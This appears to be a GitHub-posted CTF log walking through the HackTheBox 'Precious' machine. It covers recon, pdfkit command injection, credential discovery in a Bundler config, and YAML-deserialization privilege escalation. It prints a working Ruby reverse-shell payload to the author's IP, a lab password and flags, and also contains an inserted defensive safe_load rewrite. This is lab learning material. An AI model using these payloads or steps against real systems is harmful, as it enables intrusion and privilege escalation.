roaris / ctf-log


HackTheBox: Precious (Machine Easy) #36

Open roaris opened 4 months ago

roaris commented 4 months ago

https://app.hackthebox.com/machines/Precious

$ nmap -sC -sV -Pn 10.10.11.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-05 15:09 JST
Nmap scan report for 10.10.11.189
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
|   256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_  256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.69 seconds
roaris commented 4 months ago

Accessing 10.10.11.189 redirects to precious.htb, so add it to /etc/hosts

10.10.11.189 precious.htb
roaris commented 4 months ago

It apparently converts web pages to PDF. I tried entering http://example.com, http://10.10.11.189 and http://127.0.0.1, but it comes back with "Cannot load remote URL"

The X-Powered-By header in the response is Phusion Passenger(R) 6.0.15, and the X-Runtime header says Ruby

roaris commented 4 months ago

gobuster didn't turn up anything

$ gobuster dir --url http://precious.htb --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://precious.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 43432 / 87665 (49.54%)[ERROR] Get "http://precious.htb/8651": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://precious.htb/7896": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://precious.htb/xCH-video_games": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

Looked up nginx 1.18.0 on exploit-db but nothing came up. However, googling "nginx 1.18.0 exploit" brought up CVE-2021-23017. It's a vulnerability related to DNS response handling. Since this application presumably resolves the name of the URL you enter, there's a good chance this vulnerability is the way in. There was no PoC in metasploit either, but I found one on GitHub: https://github.com/M507/CVE-2021-23017-PoC

roaris commented 4 months ago

What should I pass to --dns_server? Maybe my own IP? With it running, I tried submitting a URL, but it just keeps printing WARNINGs and nothing happens

$ sudo python3 poc.py --target 10.10.11.189 --dns_server 10.10.14.20
[*] Sending poisoned ARP packets
[*] Listening
WARNING: Incompatible L3 types detected using <class 'scapy.layers.l2.ARP'> instead of <class 'scapy.layers.inet6.IPv46'> !
WARNING: Incompatible L3 types detected using <class 'scapy.layers.l2.ARP'> instead of <class 'scapy.layers.inet6.IPv46'> !
WARNING: more Incompatible L3 types detected using <class 'scapy.layers.l2.ARP'> instead of <class 'scapy.layers.inet6.IPv46'> !
WARNING: Incompatible L3 types detected using <class 'scapy.layers.l2.ARP'> instead of <class 'scapy.layers.inet6.IPv46'> !
...
roaris commented 4 months ago

It was on exploit-db too: https://www.exploit-db.com/exploits/50973 It says "Nginx 1.20.0 - Denial of Service (DOS)". So is it a DoS? https://www.cybersecurity-help.cz/vdb/SB2021052543 says RCE though

roaris commented 4 months ago

Just in case, I tried root/password and admin/password over ssh, but no luck

Stuck, so Guided Mode

roaris commented 4 months ago

Task1 : nginx is running with what additional software designed to serve web applications? A : Phusion Passenger

Task2 : Which HTTP response header reveals the underlying scripting Language of the web application? A : X-Runtime

Task3 : Which Ruby library are the PDF documents generated with? Hint : exiftool is a useful tool for looking at file metadata.

Well, the PDF generation isn't even working... and even if it were, I wouldn't have thought of running exiftool on the generated PDF

roaris commented 4 months ago

https://forum.hackthebox.com/t/official-precious-discussion/268174/112 Putting a space at the end of the URL made it work. That's way too cryptic

These two writeups also get "Cannot load remote URL", but they succeed at producing the PDF by standing up an HTTP server locally. I don't get how you'd think of spinning one up locally

Indeed, when I started one with python3 -m http.server and submitted http://10.10.14.20:8000 (10.10.14.20 is my own IP), it worked. But then why don't https://example.com or http://127.0.0.1 work? And it's baffling that adding a trailing space makes it work too

roaris commented 4 months ago

$ exiftool 7f2k4ubtv66zx7stefxibjwgchcqa6xx.pdf
ExifTool Version Number         : 12.76
File Name                       : 7f2k4ubtv66zx7stefxibjwgchcqa6xx.pdf
Directory                       : .
File Size                       : 18 kB
File Modification Date/Time     : 2024:05:06 03:53:15+09:00
File Access Date/Time           : 2024:05:06 03:55:35+09:00
File Inode Change Date/Time     : 2024:05:06 04:00:02+09:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6

Task3 : Which Ruby library are the PDF documents generated with? Hint : exiftool is a useful tool for looking at file metadata. A : pdfkit

Looking with exiftool is also a mind-reading step for me, personally. Guess I just have to get used to it

roaris commented 4 months ago

Looked up pdfkit on exploit-db and https://www.exploit-db.com/exploits/51293 came up. A command injection vulnerability (by the way, do RCE and command injection mean the same thing?) https://nvd.nist.gov/vuln/detail/CVE-2022-25765 It's a vulnerability in versions from 0.0.0 to 0.8.7.2, so it applies to v0.8.6 here too

roaris commented 4 months ago

$ searchsploit pdfkit
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
pdfkit v0.8.7.2 - Command Injection                                                   | ruby/local/51293.py
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

$ searchsploit -m 51293
  Exploit: pdfkit v0.8.7.2 - Command Injection
      URL: https://www.exploit-db.com/exploits/51293
     Path: /usr/share/exploitdb/exploits/ruby/local/51293.py
    Codes: CVE-2022–25765
 Verified: True
File Type: Python script, Unicode text, UTF-8 text executable

It's apparently a program that generates the malicious payload for you

Usage:
  python3 exploit-CVE-2022–25765.py -c <command>
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
  python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -h

Options:
  -c    Custom command mode. Provide command to generate custom payload with.
  -s    Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
  -w    URL of website running vulnerable pdfkit. (Optional)
  -p    POST parameter on website running vulnerable pdfkit. (Optional)
  -h    Show this help menu.

so this time I'll use the -s option

$ python3 51293.py -s 10.10.14.20 4444

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....

UNICORD: Exploit for CVE-2022–25765 (pdfkit) - Command Injection
OPTIONS: Reverse Shell Mode
PAYLOAD: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.20","4444"))'`
LOCALIP: 10.10.14.20:4444
WARNING: Be sure to start a local listener on the above IP and port.
EXPLOIT: Copy the payload above into a PDFKit.new().to_pdf Ruby function or any application running vulnerable pdfkit.

Send the string written under PAYLOAD as-is

$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.20] from precious.htb [10.10.11.189] 59710
bash -i
bash: cannot set terminal process group (675): Inappropriate ioctl for device
bash: no job control in this shell
ruby@precious:/var/www/pdfapp$ whoami
whoami
ruby

Got a reverse shell

roaris commented 4 months ago

user.txt can't be read

ruby@precious:/home/henry$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
ruby@precious:/home/henry$ ls -l user.txt
ls -l user.txt
-rw-r----- 1 root henry 33 May  5 14:24 user.txt

Running sudo -l gives some output I don't quite understand

ruby@precious:/home/henry$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required

Trying su henry asks for a password too. I looked inside .bashrc and .profile in case it was written there, but it wasn't

ruby@precious:/home/henry$ su henry
su henry
Password: password
su: Authentication failure
ruby@precious:/home/henry$ ls -al
ls -al
total 24
drwxr-xr-x 2 henry henry 4096 Oct 26  2022 .
drwxr-xr-x 4 root  root  4096 Oct 26  2022 ..
lrwxrwxrwx 1 root  root     9 Sep 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 henry henry  220 Sep 26  2022 .bash_logout
-rw-r--r-- 1 henry henry 3526 Sep 26  2022 .bashrc
-rw-r--r-- 1 henry henry  807 Sep 26  2022 .profile
-rw-r----- 1 root  henry   33 May  5 14:24 user.txt
roaris commented 4 months ago

No idea, so Guided Mode

Task4 : Which 2022 CVE applies to that specific version of pdfkit? A : CVE-2022-25765

Task5 : Which directory located in the running user's home directory is used by Bundler to store configuration files?

ruby@precious:~$ ls -al
ls -al
total 28
drwxr-xr-x 4 ruby ruby 4096 May  5 14:24 .
drwxr-xr-x 4 root root 4096 Oct 26  2022 ..
lrwxrwxrwx 1 root root    9 Oct 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 ruby ruby  220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 ruby ruby 3526 Mar 27  2022 .bashrc
dr-xr-xr-x 2 root ruby 4096 Oct 26  2022 .bundle
drwxr-xr-x 3 ruby ruby 4096 May  5 14:24 .cache
-rw-r--r-- 1 ruby ruby  807 Mar 27  2022 .profile

A : .bundle

ruby@precious:~$ cd .bundle
cd .bundle
ruby@precious:~/.bundle$ ls
ls
config
ruby@precious:~/.bundle$ cat config
cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

Something that looks like henry's password showed up. How on earth are you supposed to find this... you'd never expect it to be in a place like this

su henry succeeded

ruby@precious:~/.bundle$ su henry
su henry
Password: Q3c1AqGHtoI0aXAYFH
bash -i
bash: cannot set terminal process group (675): Inappropriate ioctl for device
bash: no job control in this shell
henry@precious:/home/ruby/.bundle$
henry@precious:/home/ruby/.bundle$ cd /home/henry
cd /home/henry
henry@precious:~$ cat user.txt
cat user.txt
4304a2ca40da1471df922052c3765ec2
roaris commented 4 months ago

sudo -l shows that /usr/bin/ruby /opt/update_dependencies.rb can be run with root privileges

henry@precious:~$ sudo -l
sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

I thought I could just rewrite /opt/update_dependencies.rb, but there's no write permission

henry@precious:~$ ls -l /opt/update_dependencies.rb
ls -l /opt/update_dependencies.rb
-rwxr-xr-x 1 root root 848 Sep 25  2022 /opt/update_dependencies.rb
roaris commented 4 months ago

Stuck again, so Guided Mode

Task7 : Which command can henry run with sudo, without providing a password? A : /usr/bin/ruby /opt/update_dependencies.rb

Task8 : Which is the name of the file that allows for user-controlled input to the update_dependencies.rb script? Hint : There's a reference to a particular file, which is specified without an absolute path.

henry@precious:~$ cat /opt/update_dependencies.rb
cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end
henry@precious:/home/ruby$ ls /opt
ls /opt
sample
update_dependencies.rb
henry@precious:/opt/sample$ ls
ls
dependencies.yml
henry@precious:/opt/sample$ cat dependencies.yml
cat dependencies.yml
yaml: 0.1.1
pdfkit: 0.8.6

A : dependencies.yml (I guessed and it was correct)

What do I do with dependencies.yml?

roaris commented 4 months ago

I didn't know, so I looked at https://qiita.com/schectman-hell/items/cd1c9eb16a86ae71ae51. Searching for "ruby yaml privilege escalation" brought up https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ruby-privilege-escalation/. Change the git_set part to bash -i and download it via python3 -m http.server. dependencies.yml is referenced by a relative path, so it can be placed anywhere

henry@precious:~$ wget http://10.10.14.20:8000/dependencies.yml
wget http://10.10.14.20:8000/dependencies.yml
--2024-05-05 16:15:39--  http://10.10.14.20:8000/dependencies.yml
Connecting to 10.10.14.20:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 607 [application/yaml]
Saving to: ‘dependencies.yml’

     0K                                                       100%  185M=0s

2024-05-05 16:15:40 (185 MB/s) - ‘dependencies.yml’ saved [607/607]

henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found
bash: cannot set terminal process group (675): Inappropriate ioctl for device
bash: no job control in this shell
root@precious:/home/henry# cd /root
cd /root
root@precious:~# cat root.txt
cat root.txt
9b47fec59e700c3022e647fd6eb15266

Got root.txt

Incidentally, user.txt could also be obtained by logging in over ssh as henry / Q3c1AqGHtoI0aXAYFH
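A hardened version of the YAML handling in update_dependencies.rb, as an added example that is not the box's script or the original post's code: it reads the file from an absolute path instead of the working directory, uses YAML.safe_load so a document carrying a !ruby/object tag is rejected instead of instantiated, and validates the shape of the mapping. The path, helper names and sample documents are assumptions.

```ruby
require "yaml"

# Absolute path instead of the relative "dependencies.yml" the original script
# reads from whatever directory it is invoked in (assumed location).
DEPENDENCIES_FILE = "/opt/sample/dependencies.yml"

# Parse a gem-name => version mapping from YAML text without instantiating
# arbitrary Ruby objects: safe_load permits only plain scalars, arrays and
# hashes, and raises Psych::DisallowedClass on any !ruby/object tag.
def parse_dependencies(yaml_text)
  data = YAML.safe_load(yaml_text, permitted_classes: [], aliases: false)
  raise ArgumentError, "expected a mapping of gem name to version" unless data.is_a?(Hash)
  data.each do |name, version|
    unless name.is_a?(String) && name.match?(/\A[A-Za-z0-9_\-]+\z/)
      raise ArgumentError, "bad gem name: #{name.inspect}"
    end
    unless version.is_a?(String) || version.is_a?(Numeric)
      raise ArgumentError, "bad version for #{name}: #{version.inspect}"
    end
  end
  data.transform_values(&:to_s)
end

# Compare wanted versions against what is installed (a name => version hash).
def compare_versions(wanted, installed)
  wanted.map do |name, want|
    have = installed[name]
    status = if have.nil? then :missing elsif have == want then :match else :differs end
    [name, status]
  end
end

def load_dependencies(path = DEPENDENCIES_FILE)
  parse_dependencies(File.read(path))
end

# Constructed samples: the box's benign file and a document carrying an object tag.
SAMPLE_YAML = "yaml: 0.1.1\npdfkit: 0.8.6\n"
TAGGED_YAML = "--- !ruby/object:Object {}\n"

# True when safe_load refuses the document instead of building the tagged object.
def rejected_by_safe_load?(yaml_text)
  parse_dependencies(yaml_text)
  false
rescue Psych::DisallowedClass
  true
end

if __FILE__ == $PROGRAM_NAME
  installed = { "yaml" => "0.1.1", "pdfkit" => "0.8.7.2" }
  compare_versions(parse_dependencies(SAMPLE_YAML), installed).each { |n, s| puts "#{n}: #{s}" }
  puts "tagged document rejected: #{rejected_by_safe_load?(TAGGED_YAML)}"
end
```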

roaris commented 4 months ago

Solution summary

  1. Specifying an external URL or http://127.0.0.1 errors out and no PDF is produced, so stand up an HTTP server locally and specify that URL
  2. Check the PDF with exiftool and confirm that pdfkit is used
  3. Look up pdfkit on exploit-db and find the command injection vulnerability
  4. Get a reverse shell and obtain the privileges of the ruby user
  5. Run ls -al, notice the .bundle directory, and notice that the henry user's password is inside it
  6. Use the password from step 5 to switch to the henry user with su henry and get user.txt
  7. Check sudo -l and confirm that /usr/bin/ruby /opt/update_dependencies.rb can be run with root privileges
  8. Check the contents of /opt/update_dependencies.rb and consider that privilege escalation might be possible through the YAML loading part
  9. Create a malicious YAML file that launches a shell when loaded, escalate to the root user with sudo /usr/bin/ruby /opt/update_dependencies.rb, and get root.txt

Step 8 I'll chalk up to inexperience, but 1, 2 and 5 feel like things I couldn't have pulled off